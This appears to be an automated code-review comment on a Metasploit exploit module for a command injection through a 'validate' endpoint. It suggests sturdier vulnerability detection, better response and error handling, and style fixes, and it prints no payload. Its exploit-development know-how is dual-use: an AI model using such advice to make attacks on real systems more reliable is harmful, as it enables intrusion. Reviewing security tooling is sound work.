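Review bot: `check` in 41720.rb returns `Exploit::CheckCode::Vulnerable` on an exact string match of the body against `'{"message": "success", "success": true}'`, which couples detection to the server's JSON key order and whitespace, and in any case only shows that the `validate` endpoint accepted a harmless `.raw` filename, not that the value reaches a shell. Parsing the response instead (`JSON.parse(res.body)['success'] == true`, with `JSON::ParserError` rescued to `Safe`) is more robust, and `Exploit::CheckCode::Appears` is the conventional code when the endpoint is present but injection has not been confirmed. `exploit` discards the return value of `send_request_cgi`, so a connection failure or 4xx/5xx is never reported; if a nil response is expected because the injected Python holds the request open, a one-line comment saying so would stop the next reader from "fixing" it, otherwise a `fail_with(Failure::Unreachable, ...)` on nil is warranted. Minor style: `{:file => ...}` can be `{file: ...}`, and the description's "an command injection" should read "a command injection".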